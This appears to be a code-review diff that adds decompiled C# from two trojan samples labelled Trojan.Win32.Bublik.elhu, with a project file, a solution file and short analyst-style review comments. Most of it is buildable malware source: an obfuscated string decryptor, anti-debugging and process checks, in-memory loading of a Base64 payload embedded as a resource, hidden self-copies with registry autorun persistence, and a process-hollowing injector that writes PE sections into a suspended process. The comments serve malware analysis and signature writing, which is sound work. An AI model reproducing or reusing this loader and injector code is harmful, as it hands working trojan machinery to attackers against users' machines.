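Review bot: `\u0006.\u0002` has no comment saying that it decodes `_param1` in place and returns the same array, which matters to anyone re-implementing it offline to recover the string table. A short header would do: `// XOR keystream decoder: seeded from _param0[0..2] and the data length, stepped by an LCG (x * 214013 + 2531011) every second byte, with the previous input byte fed back into each step`. The 214013 / 2531011 pair is a candidate static signature for this string protection, but it may belong to a general-purpose obfuscator rather than to the malware itself, so it should be checked against clean obfuscated .NET binaries before it is used in a rule.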
@@ -0,0 +1,101 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u0008
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(47);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static bool \u0006;
private static byte[] \u000E;
private static bool \u000F;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
if (\u0008.\u000F)
{
string str;
\u0008.\u0002.TryGetValue(_param0, out str);
return str;
}
lock (\u0008.\u0002)
{
string str1;
if (\u0008.\u0002.TryGetValue(_param0, out str1))
return str1;
if (\u0008.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u0008.\u0006 = false;
\u0008.\u0003 = new BinaryReader(executingAssembly.GetManifestResourceStream(" \u200B \u200B"));
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ -12299);
if (count == (short) 0)
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ -23699);
else
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
\u0008.\u000E = executingAssembly.GetName().GetPublicKeyToken();
if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
\u0008.\u000E = (byte[]) null;
}
int num1 = _param0 ^ -626735467;
\u0008.\u0003.BaseStream.Position = (long) num1;
byte[] numArray;
if (\u0008.\u0005 != null)
{
numArray = \u0008.\u0005;
}
else
{
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -7342 ^ num1);
numArray = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int count1 = \u0008.\u0003.ReadInt32() ^ num1 ^ 347177531;
bool flag = (count1 & int.MinValue) != 0;
if (flag)
count1 &= int.MaxValue;
byte[] bytes = \u0006.\u0002(numArray, \u0008.\u0003.ReadBytes(count1));
if (\u0008.\u000E != null != \u0008.\u0006)
{
for (int index = 0; index < count1; ++index)
{
byte num2 = \u0008.\u000E[index & 7];
byte num3 = (byte) ((int) num2 << 3 | (int) num2 >> 5);
bytes[index] = (byte) ((uint) bytes[index] ^ (uint) num3);
}
}
string str2;
if (flag && !\u0008.\u0006)
{
char[] chArray = new char[count1];
for (int index = 0; index < count1; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
if (\u0008.\u0006)
str2 = (_param0 + count1 ^ 936568).ToString("X");
string str3 = string.Intern(str2);
\u0008.\u0002.Add(_param0, str3);
if (\u0008.\u0002.Count == 47)
{
\u0008.\u0003.Close();
\u0008.\u0003 = (BinaryReader) null;
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
\u0008.\u000F = true;
}
return str3;
}
}
}
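Review bot: The string resolver `\u0008.\u0002(int)` is undocumented, yet it is the key to reading every other file of this sample. Suggested header: `// Runtime string table: id ^ -626735467 = offset into the embedded resource; each record is length-prefixed, decoded by \u0006.\u0002, then cached (47 entries, after which the reader is closed)`. It is worth adding that the constant looks per-sample, since the second assembly in this commit calls its resolver with ids in a different range (`-665676900` and nearby), so an offline decoder should read the constant from each sample's resolver rather than hard-code it. The additional XOR with the public-key token appears to be skipped for this sample, as the decompiler header reports `PublicKeyToken=null`.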
@@ -0,0 +1,5 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>kev1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="" />
<EmbeddedResource Include="file" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "kev1", "Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.csproj", "{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,457 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(-665676900);
private static string \u0005 = \u0008.\u0002(-665676900);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = false;
private static bool \u000F = false;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = false;
private static bool \u0005\u2000 = false;
private static bool \u0008\u2000 = false;
private static bool \u0006\u2000 = false;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = false;
private static bool \u0002\u2001 = false;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = false;
private static bool \u0008\u2001 = false;
private static bool \u0006\u2001 = false;
private static bool \u000E\u2001 = false;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(-665676875);
private static string \u0003\u2002 = \u0008.\u0002(-665676839);
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(-665676861);
private static bool \u0005\u2003 = false;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(-665677671));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677682)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-665677636);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-665677647))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677662)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677616)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677626)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677579)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677586)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677795)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-665677805));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677754), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677354));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-665677560),
Arguments = \u0008.\u0002(-665677508),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677163), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677073));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176))))
return;
string str = \u0008.\u0002(-665677275) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-665677226) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-665677247);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
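Review bot: The entry method `\u0002(string[])` has no comment separating its stages, so the behaviour an analyst needs for triage is buried in several hundred lines of flag-gated `try` / empty-`catch` blocks. With the field initialisers at the top of the class, only the process-name checks guarded by `\u0002\u2000` and `\u000E\u2000` and the block guarded by `\u0002\u2003` are enabled. That block copies the running executable to two locations, sets `FileAttributes.Hidden` on both copies and writes the first path under the same value name in `Registry.CurrentUser` and `Registry.LocalMachine`, which looks like autorun persistence although the key name is an encoded string not visible here. The embedded-resource stage is unconditional: a manifest resource is Base64-decoded and passed to `Assembly.Load` on a new thread, with the native loader in class `\u0003` as the last fallback. I would add a header comment such as `// Stages: environment checks -> in-memory load of embedded Base64 resource -> self-copy (Hidden) + HKCU/HKLM value -> optional write-and-launch of a text file (off by default)` and record each decoded string next to its `\u0008.\u0002(...)` call once recovered.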
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System;
using System.Runtime.InteropServices;
internal sealed class \u0003
{
private void \u0002() => Console.Write(\u0008.\u0002(-665677671));
[DllImport("kernel32")]
private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);
[DllImport("kernel32")]
private static extern IntPtr LoadLibrary(string _param0);
public void \u0002(byte[] _param1, string _param2, string _param3)
{
\u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
\u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
this.\u0002();
\u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
\u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
this.\u0002();
\u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
\u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
this.\u0002();
structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
obj4.\u0002 = 65543U;
this.\u0002();
GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
this.\u0002();
gcHandle.Free();
\u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
this.\u0002();
\u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
this.\u0002();
if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
return;
\u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665677035)), typeof (\u0003.\u0002));
\u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665677056)), \u0008.\u0002(-665677008)), typeof (\u0003.\u0005));
\u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676971)), typeof (\u0003.\u0008));
this.\u0002();
\u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676992)), typeof (\u0003.\u0003));
\u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676949)), typeof (\u0003.\u0006));
\u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676656)), typeof (\u0003.\u000E));
this.\u0002();
\u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676615)), typeof (\u0003.\u000F));
this.\u0002();
int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
this.\u0002();
if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
return;
int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
this.\u0002();
for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
{
structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
byte[] numArray = new byte[(IntPtr) structure1.\u0008];
for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
this.\u0002();
int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
}
int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
this.\u0002();
byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
this.\u0002();
int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
int num8 = (int) forFunctionPointer7(obj3.\u0003);
}
private delegate bool \u0002(
string _param1,
string _param2,
IntPtr _param3,
IntPtr _param4,
bool _param5,
\u0003.\u0002\u2000 _param6,
IntPtr _param7,
string _param8,
ref \u0003.\u0006\u2000 _param9,
out \u0003.\u000E\u2000 _param10);
private delegate bool \u0003(
IntPtr _param1,
IntPtr _param2,
byte[] _param3,
uint _param4,
object _param5);
private delegate bool \u0005(IntPtr _param1, IntPtr _param2);
private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);
private delegate bool \u0008(
IntPtr _param1,
IntPtr _param2,
uint _param3,
\u0003.\u0008\u2000 _param4,
\u0003.\u0005\u2000 _param5);
private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);
private delegate uint \u000F(IntPtr _param1);
private enum \u0002\u2000 : uint
{
}
private struct \u0002\u2002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public uint \u0005\u2000;
}
private enum \u0003\u2000 : uint
{
}
private enum \u0005\u2000 : uint
{
}
private struct \u0006\u2000
{
public uint \u0002;
public string \u0003;
public string \u0005;
public string \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public short \u000E\u2000;
public short \u000F\u2000;
public IntPtr \u0002\u2001;
public IntPtr \u0003\u2001;
public IntPtr \u0005\u2001;
public IntPtr \u0008\u2001;
}
private enum \u0008\u2000 : uint
{
}
private struct \u000E\u2000
{
public IntPtr \u0002;
public IntPtr \u0003;
public uint \u0005;
public uint \u0008;
}
private struct \u000F\u2000
{
public int \u0002;
public IntPtr \u0003;
public bool \u0005;
}
private struct \u0002\u2001
{
public ushort \u0002;
public ushort \u0003;
public ushort \u0005;
public ushort \u0008;
public ushort \u0006;
public ushort \u000E;
public ushort \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public ushort \u0005\u2000;
public ushort \u0008\u2000;
public ushort \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0008\u2001;
public int \u0006\u2001;
}
private struct \u0003\u2001
{
public ushort \u0002;
public ushort \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public ushort \u000E;
public ushort \u000F;
}
private struct \u0005\u2001
{
public uint \u0002;
public uint \u0003;
}
private struct \u0006\u2001
{
public uint \u0002;
public \u0003.\u0003\u2001 \u0003;
public \u0003.\u0008\u2001 \u0005;
}
private struct \u0008\u2001
{
public ushort \u0002;
public byte \u0003;
public byte \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
public ushort \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
public ushort \u0008\u2001;
